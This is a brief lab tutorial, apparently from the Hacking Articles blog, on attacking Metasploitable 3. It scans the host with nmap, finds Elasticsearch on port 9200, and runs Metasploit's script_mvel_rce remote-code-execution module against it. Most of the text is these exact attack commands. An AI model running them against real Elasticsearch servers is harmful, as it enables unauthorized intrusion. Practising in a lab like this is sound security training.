Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.
nmap –p- -A 192.168.1.8
Nmap shows a splendid result and in the result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.
YES! We have an exploit for that. Let’s use it to our advantage.
To use this exploit go to Metasploit and type:
use exploit/multi/elasticsearch/script_mvel_rce
msf exploit (script_mvel_rce)>set rhost 192.168.1.8
msf exploit (script_mvel_rce)>set rport 9200
msf exploit (script_mvel_rce)>exploit
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.
The post Hack Metasploitable 3 using Elasticsearch Exploit appeared first on Hacking Articles.